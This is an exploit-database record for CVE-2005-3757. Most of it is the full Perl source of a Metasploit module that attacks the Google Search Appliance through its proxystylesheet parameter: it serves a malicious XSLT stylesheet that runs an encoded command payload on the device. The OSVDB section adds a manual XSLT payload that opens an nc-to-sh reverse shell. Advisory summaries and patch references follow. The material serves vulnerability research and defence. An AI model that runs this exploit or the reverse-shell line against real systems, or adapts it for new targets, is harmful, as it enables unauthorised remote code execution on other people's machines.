{"bulletinFamily": "exploit", "id": "EDB-ID:1333", "cvelist": ["CVE-2005-3757"], "modified": "2005-11-20T00:00:00", "lastseen": "2016-01-31T14:01:32", "edition": 1, "sourceData": "##\n# This file is part of the Metasploit Framework and may be redistributed\n# according to the licenses defined in the Authors field below. In the\n# case of an unknown or missing license, this file defaults to the same\n# license as the core Framework (dual GPLv2 and Artistic). The latest\n# version of the Framework can always be obtained from metasploit.com.\n##\n\npackage Msf::Exploit::google_proxystylesheet_exec;\n\nuse strict;\nuse base \"Msf::Exploit\";\nuse Pex::Text;\nuse IO::Socket;\nuse IO::Select;\nmy $advanced = { };\n\nmy $info =\n{\n\t'Name' => 'Google Appliance ProxyStyleSheet Command Execution',\n\t'Version' => '$Revision: 1.1 $',\n\t'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],\n\t\n\t'Description' => \n\t\tPex::Text::Freeform(qq{\n\t\t\tThis module exploits a feature in the Saxon XSLT parser used by\n\t\tthe Google Search Appliance. This feature allows for arbitrary\n\t\tjava methods to be called. Google released a patch and advisory to \n\t\ttheir client base in August of 2005 (GA-2005-08-m). The target appliance\n\t\tmust be able to connect back to your machine for this exploit to work.\n\t\t}),\n\t\t\n\t'Arch' => [ ],\n\t'OS' => [ ],\n\t'Priv' => 0,\n\t'UserOpts' => \n\t\t{\n\t\t\t'RHOST' => [ 1, 'HOST', 'The address of the Google appliance'],\n\t\t\t'RPORT' => [ 1, 'PORT', 'The port used by the search interface', 80],\n\t\t\t'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],\n\t\t\t'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', \"0.0.0.0\" ],\n\t\t\t'HTTPADDR' => [ 0, 'HOST', 'The address that can be used to connect back to this system'],\n\t\t},\n\t'Payload' => \n\t\t{\n\t\t\t'Space' => 1024,\n\t\t\t'Keys' => [ 'cmd' ],\n\t\t},\n\t'Refs' => \n\t\t[\n\t\t\t['OSVDB', 20981],\n\t\t],\n\t'DefaultTarget' => 0,\n\t'Targets' =>\n\t\t[\n\t\t\t[ 'Google Search Appliance']\n\t\t],\n\t'Keys' => [ 'google' ],\n\n\t'DisclosureDate' => 'Aug 16 2005',\n};\n\nsub new\n{\n\tmy $class = shift;\n\tmy $self;\n\t\n\t$self = $class->SUPER::new(\n\t\t\t{ \n\t\t\t\t'Info' => $info,\n\t\t\t\t'Advanced' => $advanced,\n\t\t\t},\n\t\t\t@_);\n\n\treturn $self;\n}\n\nsub Check {\n\tmy $self = shift;\n\tmy $s = $self->ConnectSearch;\n\t\n\tif (! $s) {\n\t\treturn $self->CheckCode('Connect');\n\t}\n\t\n\tmy $url =\n\t\t\"/search?client=\". Pex::Text::AlphaNumText(int(rand(15))+1). \"&\".\n\t\t\"site=\".Pex::Text::AlphaNumText(int(rand(15))+1).\"&\".\n\t\t\"output=xml_no_dtd&\".\n\t\t\"q=\".Pex::Text::AlphaNumText(int(rand(15))+1).\"&\".\n\t\t\"proxystylesheet=http://\".Pex::Text::AlphaNumText(int(rand(32))+1).\"/\";\n\t\n\t$s->Send(\"GET $url HTTP/1.0\\r\\n\\r\\n\");\n\tmy $page = $s->Recv(-1, 5);\n\t$s->Close;\n\n\tif ($page =~ /cannot be resolved to an ip address/) {\n\t\t$self->PrintLine(\"[*] This system appears to be vulnerable >:-)\");\n\t\treturn $self->CheckCode('Confirmed');\n\t}\n\t\n\tif ($page =~ /ERROR: Unable to fetch the stylesheet/) {\n\t\t$self->PrintLine(\"[*] This system appears to be patched\");\n\t}\n\t\n\t$self->PrintLine(\"[*] This system does not appear to be vulnerable\");\n\treturn $self->CheckCode('Safe');\t\n}\n\n\nsub Exploit\n{\n\tmy $self = shift;\n\tmy ($s, $page);\n\t\n\t# Request the index page to obtain a redirect response\n\t$s = $self->ConnectSearch || return;\n\t$s->Send(\"GET / HTTP/1.0\\r\\n\\r\\n\");\n\t$page = $s->Recv(-1, 5);\n\t$s->Close;\n\n\t# Parse the redirect to get the client and site values\n\tmy ($goog_site, $goog_clnt) = $page =~ m/^location.*site=([^\\&]+)\\&.*client=([^\\&]+)\\&/im;\n\tif (! $goog_site || ! $goog_clnt) {\n\t\t$self->PrintLine(\"[*] Invalid response to our request, is this a Google appliance?\");\n\t\t#$self->PrintLine($page);\n\t\t#!!! return;\n\t\t$goog_site = 'test';\n\t\t$goog_clnt = 'test';\n\t}\n\n\t# Create the listening local socket that will act as our HTTP server\n\tmy $lis = IO::Socket::INET->new(\n\t\t\tLocalHost => $self->GetVar('HTTPHOST'),\n\t\t\tLocalPort => $self->GetVar('HTTPPORT'),\n\t\t\tReuseAddr => 1,\n\t\t\tListen => 1,\n\t\t\tProto => 'tcp');\n\t\n\tif (not defined($lis)) {\n\t\t$self->PrintLine(\"[-] Failed to create local HTTP listener on \" . $self->GetVar('HTTPPORT'));\n\t\treturn;\n\t}\n\tmy $sel = IO::Select->new($lis);\n\t\n\t# Send a search request with our own address in the proxystylesheet parameter\n\tmy $query = Pex::Text::AlphaNumText(int(rand(32))+1);\n\t\n\tmy $proxy =\n\t\t\"http://\".\n\t\t($self->GetVar('HTTPADDR') || Pex::Utils::SourceIP($self->GetVar('RHOST'))).\n\t\t\":\".$self->GetVar('HTTPPORT').\"/\".Pex::Text::AlphaNumText(int(rand(15))+1).\".xsl\";\n\t\n\tmy $url = \n\t\t\"/search?client=\". $goog_clnt .\"&site=\". $goog_site .\n\t\t\"&output=xml_no_dtd&proxystylesheet=\". $proxy .\n\t\t\"&q=\". $query .\"&proxyreload=1\";\n\n\t$self->PrintLine(\"[*] Sending our malicious search request...\");\n\t$s = $self->ConnectSearch || return;\n\t$s->Send(\"GET $url HTTP/1.0\\r\\n\\r\\n\");\n\t$page = $s->Recv(-1, 3);\n\t$s->Close;\n\n\t$self->PrintLine(\"[*] Listening for connections to http://\" . $self->GetVar('HTTPHOST') . \":\" . $self->GetVar('HTTPPORT') . \" ...\");\n\t\n\t# Did we receive a connection?\n\tmy @r = $sel->can_read(30);\n\t\n\tif (! @r) {\n\t\t$self->PrintLine(\"[*] No connection received from the search engine, possibly patched.\");\n\t\t$lis->close;\n\t\treturn;\n\t}\n\n\tmy $c = $lis->accept();\n\tif (! $c) {\n\t\t$self->PrintLine(\"[*] No connection received from the search engine, possibly patched.\");\n\t\t$lis->close;\n\t\treturn;\t\n\t}\n\n\tmy $cli = Msf::Socket::Tcp->new_from_socket($c);\n\t$self->PrintLine(\"[*] Connection received from \".$cli->PeerAddr.\"...\");\t\n\t$self->ProcessHTTP($cli);\n\treturn;\n}\n\nsub ConnectSearch {\n\tmy $self = shift;\n\tmy $s = Msf::Socket::Tcp->new(\n\t\t'PeerAddr' => $self->GetVar('RHOST'),\n\t\t'PeerPort' => $self->GetVar('RPORT'),\n\t\t'SSL' => $self->GetVar('SSL')\n\t);\n\t\n\tif ($s->IsError) {\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\n\t\treturn;\n\t}\n\treturn $s;\n}\n\nsub ProcessHTTP\n{\n\tmy $self = shift;\n\tmy $cli = shift;\n\tmy $targetIdx = $self->GetVar('TARGET');\n\tmy $target = $self->Targets->[$targetIdx];\n\tmy $ret = $target->[1];\n\tmy $shellcode = $self->GetVar('EncodedPayload')->Payload;\n\tmy $content;\n\tmy $rhost;\n\tmy $rport;\n\n\t# Read the first line of the HTTP request\n\tmy ($cmd, $url, $proto) = split(/ /, $cli->RecvLine(10));\n\n\t# The way we call Runtime.getRuntime().exec, Java will split\n\t# our string on whitespace. Since we are injecting via XSLT,\n\t# inserting quotes becomes a huge pain, so we do this...\n\tmy $exec_str = \n\t\t'/usr/bin/perl -e system(pack(qq{H*},qq{' .\n\t\tunpack(\"H*\", $self->GetVar('EncodedPayload')->RawPayload).\n\t\t'}))';\n\n\t# Load the template from our data section, we have to manually\n\t# seek and reposition to allow the exploit to be used more\n\t# than once without a reload.\n\tseek(DATA, 0, 0);\n\twhile(<DATA>) { last if /^__DATA__$/ }\n\twhile(<DATA>) {\t$content .= $_ }\n\n\t# Insert our command line\n\t$content =~ s/:x:MSF:x:/$exec_str/;\n\t\n\t# Send it to the requesting appliance\n\t$rport = $cli->PeerPort;\n\t$rhost = $cli->PeerAddr;\n\t$self->PrintLine(\"[*] HTTP Client connected from $rhost, sending XSLT...\");\n\t\n\tmy $res = \"HTTP/1.1 200 OK\\r\\n\" .\n\t \"Content-Type: text/html\\r\\n\" .\n\t \"Content-Length: \" . length($content) . \"\\r\\n\" .\n\t \"Connection: close\\r\\n\" .\n\t \"\\r\\n\" .\n\t $content;\n\n\t$self->PrintLine(\"[*] Sending \".length($res).\" bytes...\");\n\t$cli->Send($res);\n\t$cli->Close;\n}\n\n1;\n\n# milw0rm.com [2005-11-20]\n", "published": "2005-11-20T00:00:00", "href": "https://www.exploit-db.com/exploits/1333/", "osvdbidlist": ["20981"], "reporter": "H D Moore", "hash": "8d738d0ca6f3b9611ddf5bc46f6932e7ccf31a19223390b07a09c1c950e0c6bd", "title": "Google Search Appliance proxystylesheet XSLT Java Code Execution", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Google Search Appliance proxystylesheet XSLT Java Code Execution. CVE-2005-3757. Remote exploit for hardware platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1333/", "enchantments": {"vulnersScore": 7.6}}

{"result": {"cve": [{"id": "CVE-2005-3757", "type": "cve", "title": "CVE-2005-3757", "description": "The Saxon XSLT parser in Google Mini Search Appliance, and possibly Google Search Appliance, allows remote attackers to obtain sensitive information and execute arbitrary code via dangerous Java class methods in select attribute of xsl:value-of tags in XSLT style sheets, such as (1) system-property, (2) sys:getProperty, and (3) run:exec.", "published": "2005-11-22T16:03:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3757", "cvelist": ["CVE-2005-3757"], "lastseen": "2016-09-03T06:00:57"}], "osvdb": [{"id": "OSVDB:20981", "type": "osvdb", "title": "Google Search Appliance proxystylesheet XSLT Java Code Execution", "description": "## Vulnerability Description\nThe Google Search Appliance contains a flaw that allows a remote attacker to execute arbitrary Java methods as an unprivileged user. The issue is due to the proxystylesheet parameter in the search request, which loads an external XSLT style sheet from a URL. The XSLT parser is based on Saxon, which allows Java method calls from within an XSLT document. This allows an attacker to execute arbitrary code and commands on the appliance.\n## Solution Description\nUpgrade to the version specified by Google advisory GA-2005-08-m, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nThe Google Search Appliance contains a flaw that allows a remote attacker to execute arbitrary Java methods as an unprivileged user. The issue is due to the proxystylesheet parameter in the search request, which loads an external XSLT style sheet from a URL. The XSLT parser is based on Saxon, which allows Java method calls from within an XSLT document. This allows an attacker to execute arbitrary code and commands on the appliance.\n## Manual Testing Notes\nReplace the proxystylesheet variable in the search URL with a URL to a malicious XSLT style sheet. This style sheet should contain a block like:\n\n<!-- Google Appliance Remote Shell ;-) -->\n\nXSLT Version: <xsl:value-of select=\"system-property('xsl:version')\"/> <br />\nXSLT Vendor: <xsl:value-of select=\"system-property('xsl:vendor')\" /> <br />\nXSLT URL: <xsl:value-of select=\"system-property('xsl:vendor-url')\" /> <br />\nOS: <xsl:value-of select=\"sys:getProperty('os.name')\" /> <br />\nVersion: <xsl:value-of select=\"sys:getProperty('os.version')\" /> <br />\nArch: <xsl:value-of select=\"sys:getProperty('os.arch')\" /> <br />\nUserName: <xsl:value-of select=\"sys:getProperty('user.name')\" /> <br />\nUserHome: <xsl:value-of select=\"sys:getProperty('user.home')\" /> <br />\nUserDir: <xsl:value-of select=\"sys:getProperty('user.dir')\" /> <br />\n\nExecuting command...<br />\n<xsl:value-of select=\"run:exec(run:getRuntime(), 'sh -c nc$255.255.255.255$53|sh|nc$255.255.255.255$53')\" />\n\n<xsl:text disable-output-escaping=\"yes\">\n## References:\nSecurity Tracker: 1015246\n[Secunia Advisory ID:17644](https://secuniaresearch.flexerasoftware.com/advisories/17644/)\n[Related OSVDB ID: 20979](https://vulners.com/osvdb/OSVDB:20979)\n[Related OSVDB ID: 20980](https://vulners.com/osvdb/OSVDB:20980)\n[Related OSVDB ID: 20978](https://vulners.com/osvdb/OSVDB:20978)\n[Related OSVDB ID: 20977](https://vulners.com/osvdb/OSVDB:20977)\nOther Advisory URL: http://metasploit.com/research/vulns/google_proxystylesheet/\nNews Article: http://www.techworld.com/networking/news/index.cfm?NewsID=4840\nNews Article: http://www.webpronews.com/insiderreports/searchinsider/wpn-49-20051122GoogleMiniNeededBigSecurityPatch.html\nNews Article: http://news.techwhack.com/2526/221129-google-fixes-security-flaws-in-google-mini/\nNews Article: http://www.eweek.com/article2/0,1895,1891796,00.asp\nGeneric Exploit URL: http://metasploit.com/projects/Framework/link.php?type=exploit&vers=2&name=google_proxystylesheet_exec\nFrSIRT Advisory: ADV-2005-2500\n[CVE-2005-3757](https://vulners.com/cve/CVE-2005-3757)\nBugtraq ID: 15509\n", "published": "2005-11-21T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:20981", "cvelist": ["CVE-2005-3757"], "lastseen": "2017-04-28T13:20:18"}], "seebug": [{"id": "SSV-71400", "type": "seebug", "title": "Google Appliance ProxyStyleSheet Command Execution", "description": "Summary: \nGoogle search tool is a large-scale enterprise-level hardware search tool.< br/>Google Mini search tool(may also include the Google search tool)in Saxon XSLT parser that allows remote attackers through the dangers of the XSLT type form label value of the attribute in the java class, such as (1) The system-property, and (2) sys:getProperty, and (3) run:exec, to obtain sensitive information and execute arbitrary code.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-71400", "cvelist": ["CVE-2005-3757"], "lastseen": "2016-07-30T15:53:30"}], "exploitdb": [{"id": "EDB-ID:16907", "type": "exploitdb", "title": "Google Appliance ProxyStyleSheet Command Execution", "description": "Google Appliance ProxyStyleSheet Command Execution. CVE-2005-3757. Webapps exploit for hardware platform", "published": "2010-07-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/16907/", "cvelist": ["CVE-2005-3757"], "lastseen": "2016-02-02T06:47:39"}], "metasploit": [{"id": "MSF:EXPLOIT/UNIX/WEBAPP/GOOGLE_PROXYSTYLESHEET_EXEC", "type": "metasploit", "title": "Google Appliance ProxyStyleSheet Command Execution", "description": "This module exploits a feature in the Saxon XSLT parser used by the Google Search Appliance. This feature allows for arbitrary java methods to be called. Google released a patch and advisory to their client base in August of 2005 (GA-2005-08-m). The target appliance must be able to connect back to your machine for this exploit to work.", "published": "2007-03-12T01:08:18", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "cvelist": ["CVE-2005-3757"], "lastseen": "2017-08-21T15:31:47"}], "packetstorm": [{"id": "PACKETSTORM:82357", "type": "packetstorm", "title": "Google Appliance ProxyStyleSheet Command Execution", "description": "", "published": "2009-10-30T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://packetstormsecurity.com/files/82357/Google-Appliance-ProxyStyleSheet-Command-Execution.html", "cvelist": ["CVE-2005-3757"], "lastseen": "2016-12-05T22:15:03"}], "nessus": [{"id": "GOOGLE_SEARCH_APPLIANCE_PROXYSTYLESHEET.NASL", "type": "nessus", "title": "Google Search Appliance proxystylesheet Parameter Multiple Remote Vulnerabilities (XSS, Code Exec, ID)", "description": "The remote Google Search Appliance / Mini Search Appliance fails to sanitize user-supplied input to the 'proxystylesheet' parameter, which is used for customization of the search interface. Exploitation of this issue may lead to arbitrary code execution (as an unprivileged user), port scanning, file discovery, and cross-site scripting.", "published": "2005-11-22T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=20241", "cvelist": ["CVE-2005-3757", "CVE-2005-3758", "CVE-2005-3756", "CVE-2005-3754", "CVE-2005-3755"], "lastseen": "2017-06-27T05:45:34"}]}}